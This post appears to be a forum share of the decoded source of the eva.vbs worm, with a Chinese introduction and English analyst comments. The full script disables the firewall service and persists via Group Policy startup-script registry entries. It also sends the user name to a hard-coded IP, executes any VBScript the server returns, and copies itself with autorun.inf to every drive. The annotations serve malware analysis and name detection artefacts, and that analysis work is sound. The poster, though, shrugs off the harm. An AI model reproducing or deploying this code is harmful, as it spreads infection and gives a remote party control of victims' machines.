解密的eva.vbs 病毒代码
学习一下了,很少看到vbs的病毒的代码了。学习下。呵呵。病毒作者只是要找个工作,不容易啊。
知道了它都干什么了,我也懒的说怎么杀了。我又不是杀毒软件,我又不收费。
' === Analyst annotation (defensive read of the decoded eva.vbs sample) ===
' Top-level body. It runs in one of two modes, chosen at the
' "If Instr(ThisPath,SysDir)>0" line below:
'   * started from the system directory (i.e. the installed prncfg.vbs copy):
'     persistence is already in place, so it beacons once and then loops
'     forever, infecting every drive that newly appears;
'   * started from anywhere else (typically via a drive's autorun.inf):
'     it opens Explorer as a decoy, checks it is the only running instance,
'     installs itself as <SystemFolder>\prncfg.vbs and starts that copy.
' NOTE(review): this listing is a decoded dump. The multi-line string literals
' and unescaped quotes inside the ExeCute(...) calls are not valid VBScript as
' printed; the original presumably carried them in an encoded form.
On Error Resume Next
' Mixed-case ProgIDs are equivalent to the usual spelling (ProgIDs are
' case-insensitive); this looks like an attempt to defeat naive string
' matching — inference, not something the code states.
Set FSO=CreateObject ("scRiPtiNG.fILeSystemObject")
Set WshShell=CreateObject( ("WscRipT.sheLl"))
Dim Dri_List,Dri_List0
Dim IsSend
IsSend=0
' Real system date, saved so it can be restored after each clock change below.
C_Time=Date()
' Stops the SharedAccess service (Windows Firewall / Internet Connection
' Sharing) in a hidden window (second argument 0). Detection point.
WshShell.Run "net stop sharedaccess",0
Set Drvs=FSO.Drives
SysDir=FSO.GetSpecialFolder(1) ' system directory: GetSpecialFolder argument 1 = SystemFolder
ThisPath=WScript.ScriptFullName
' Reads its own source into sCopy. WriteAuto/WriteFile below drop this text
' as eva.vbs on each drive root and as prncfg.vbs in the system directory.
Set Fc=FSO.OpenTextFile(ThisPath,1)
sCopy=Fc.ReadAll
Fc.Close
Set Fc=Nothing
' Persistence: writes a .reg file that registers %WinDir%\system32\prncfg.vbs
' as a local Group Policy machine startup script (both under
' Policies\Microsoft\Windows\System\Scripts\Startup and under
' CurrentVersion\Group Policy\State\Machine\Scripts\Startup), then imports it
' silently and deletes it. The string content below, including the original
' analyst's '-prefixed notes (a clean machine has only the ...\System key with
' Allow-LogonScript-NetbiosDisabled=1), is left exactly as printed.
' Defender note: these registry keys are the cleanest artefact to check.
Call WriteFile(SysDir&"\SysInfo.reg", ("Windows Registry Editor Version 5.00
'下面的注册表文件是为了启动修改过的prncfg.vbs文件 此处为病毒的最大的特点
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="%WinDir%\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
'我对比了一下没中毒的机器,发现只到HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System下便没了后面的项了.
'只有个Allow-LogonScript-NetbiosDisabled 值为1
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0\0]
"Script"="%WinDir%\\system32\\prncfg.vbs"
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0]
"GPO-ID"="LocalGPO"
"SOM-ID"="Local"
"FileSysPath"="%WinDir%\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"GPOName"="Local Group Policy"
' "Scripts\Startup\0"这些内容也是正常的没有的.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0]
"Script"="%WinDir%\\system32\\prncfg.vbs"
"Parameters"=""
"ExecTime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"))
' Silent import (/s suppresses the confirmation prompt), hidden window.
WshShell.Run "regedit /s SysInfo.reg",0
Wscript.Sleep 200
' Removes the dropper's .reg file (True = delete even if read-only).
FSO.DeleteFile SysDir&"\SysInfo.reg",True
If Instr(ThisPath,SysDir)>0 then' running from the system directory: propagation mode (original analyst: "this is where the infection begins")
' Snapshot of the ready drive letters at start-up.
Dri_List0=ListDrv()
' Replaces the 4th character of the date string with "4" (e.g. "2008-..." ->
' "2004-..."; the exact effect depends on the locale's Date() format) and sets
' the system clock to it before touching the drives; restored afterwards.
' Original analyst: "changes the year to 2004 — to knock out antivirus?"
O_Time=Left(C_Time,3)&"4"&Right(C_Time,Len(C_Time)-4)
WshShell.Run "cmd /c Date "&O_Time,0
Wscript.Sleep 10000
For Dri_i=1 To Len(Dri_List0)
' Drops autorun.inf + eva.vbs on every ready drive root.
Call WriteAuto(Mid(Dri_List0,Dri_i,1)&":\")
Next
' Restores the real date.
WshShell.Run "cmd /c Date "&C_Time,0
' Collects the logged-on user name via WMI; it is sent in the beacon below.
Set objWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set colComputers = objWMIService.ExecQuery("Select * from Win32_ComputerSystem")
For Each objComputer in colComputers
UserName=ObjComputer.username
Next
' Main loop: one successful HTTP beacon, then a 1-second poll that infects any
' drive letter that was not present in the previous snapshot (new media).
Do
If IsSend=0 Then
Set xml=CreateObject( ("MIcROSOft.xmlhtTp"))
xml.Open "GET","http://202.119.104.100/zzb/eva/count.asp?a="&UserName,0 ' beacon with the user name; original analyst: "victim counter — the IP is some government website, presumably compromised"
xml.Send()
If Err.Number=0 Then
IsSend=1
' Remote code execution: any response longer than 15 characters is executed
' as VBScript, so the server can push arbitrary code to the infected host.
' Defender note: outbound GETs to the URL above are the network artefact.
If Len(xml.responseText)>15 Then ExeCute xml.responseText
Else
' Beacon failed: clear the error and retry on the next iteration (IsSend stays 0).
Err.Clear
End If
Set xml=Nothing
End If
Dri_List=ListDrv()
For Dri_k=1 To Len(Dri_List)
' Drive letter not in the previous snapshot -> treat as newly inserted.
If Instr(Dri_List0,Mid(Dri_List,Dri_k,1))<=0 Then
Call WriteAuto(Mid(Dri_List,Dri_k,1)&":\")
End If
Next
Dri_List0=Dri_List
Wscript.Sleep 1000
Loop
Else ' first run (e.g. launched from a drive's autorun.inf): decoy, single-instance check, install. Original analyst: Explorer is opened on the drive so the victim sees what they expected, but the delay is clearly noticeable (a limitation of VBS).
WshShell.Run "Explorer .\"
Wscript.Sleep 500
' SendKeys: "%" is Alt, so "% X" is Alt+Space then X — presumably the window
' system menu followed by its Maximise accelerator. TODO confirm on a Chinese UI.
WshShell.SendKeys "% X"
' Focuses the window titled "My Computer" (Chinese UI string).
WshShell.AppActivate ("我的电脑")
Wscript.Sleep 100
' Alt+Space then C — presumably closes the "My Computer" window the user
' launched from, so only the decoy Explorer window remains. Inference.
WshShell.SendKeys "% C"
RunFlag=0
' Single-instance check: counts wscript.exe processes via WMI and quits when
' another script host is already running (this one counts as the first).
For each ps in getobject _
("winmgmts:\\.\root\cimv2:win32_process").instances_
If LCase(ps.name)="wscript.exe" Then
RunFlag=RunFlag+1
End If
Next
If RunFlag>=2 Then Wscript.quit
' Sets the system date to the system folder's creation date (date part only,
' text before the first space) before writing prncfg.vbs — presumably so the
' dropped file's timestamp blends in with the OS installation — then restores it.
Set SF=FSO.GetFolder(SysDir)
F_Time=Left(SF.DateCreated,Instr(SF.DateCreated," ")-1)
WshShell.Run "cmd /c Date "&F_Time,0
Wscript.Sleep 100
Call WriteFile(SysDir&"\prncfg.vbs",sCopy) ' overwrites <SystemFolder>\prncfg.vbs (the name of a printer-configuration script shipped in system32 on XP-era Windows) with this script; WriteFile deletes any existing file first, so nothing is appended
WshShell.Run "cmd /c Date "&C_Time,0
' Hands over to the installed copy, which then takes the If branch above.
WshShell.Run SysDir&"\prncfg.vbs"
End If
Function ListDrv() ' returns the letters of all currently ready drives as one string (e.g. "CDE")
' Iterates the global Drvs collection (FSO.Drives set at top level) and keeps
' only drives whose IsReady is True, so empty removable/optical drives are
' skipped. The body is wrapped in ExeCute; the multi-line string printed here
' is the decoded form and is not valid VBScript as-is.
ExeCute ("Dim Tmp_List
Tmp_list=""
For Each Drv in Drvs
If Drv.IsReady Then
Tmp_List=Tmp_List&Drv.DriveLetter
End If
Next
ListDrv=Tmp_list")
End Function
Sub WriteAuto(Path)
' Infects one drive root (Path is like "D:\"):
'   1. clears any existing autorun.inf: a folder of that name is renamed to
'      the value of Rnd() (a random fraction), a file is deleted even if it
'      is read-only (True);
'   2. writes a new autorun.inf whose menu entries (labels in Chinese:
'      "change icon", "Open(&O)", "Explorer(&X)") all run
'      "WScript.exe eva.vbs", so opening the drive launches the script;
'   3. drops this script's source (global sCopy) as eva.vbs.
' WriteFile marks both files read-only + hidden + system.
' Defender note: a hidden/system autorun.inf and eva.vbs pair at a drive root,
' possibly next to a folder named with a random fraction, is the on-disk
' artefact; the folder rename in step 1 is presumably aimed at the common
' "autorun.inf folder" immunisation — inference.
' The bodies are wrapped in ExeCute; the strings are printed in decoded form.
ExeCute ("If FSO.FolderExists(Path&"autorun.inf") Then
FSO.MoveFolder Path&"autorun.inf",Path&Rnd()
ElseIf FSO.FileExists(Path&"autorun.inf") Then
FSO.DeleteFile Path&"autorun.inf",True
End If"
)
Call WriteFile(Path&"autorun.inf", ("[autorun]
open=
shell\n=更换图标
shell\open=打开(&O)
shell\open\Command=WScript.exe eva.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe eva.vbs"))
Call WriteFile(Path&"eva.vbs",sCopy)
End Sub
Sub WriteFile(fPath,Content)
' Replaces the file at fPath with Content (text mode, ForWriting=2, create=True)
' and then sets its attributes to 7 = ReadOnly(1) + Hidden(2) + System(4).
' Any existing file is deleted first, read-only or not (True), so every call
' overwrites rather than appends. Uses the global FSO; the body is wrapped in
' ExeCute and printed here in decoded form.
ExeCute ("If FSO.FileExists(fPath) Then FSO.DeleteFile fPath,True
Set Fc=FSO.OpenTextFile(fPath,2,True)
Fc.Write Content
Fc.Close
Set Fc=Nothing
Set Fa=FSO.GetFile(fPath)
Fa.Attributes=7
Set Fa=Nothing")
End Sub
'I don't want to hurt you, but I just want an IT job
'Email:evar@live.cn
'呵呵,作者也不容易呀,病毒也没干什么坏事.
'呵呵呵通过这个vbs也学到了不少东西.:-)

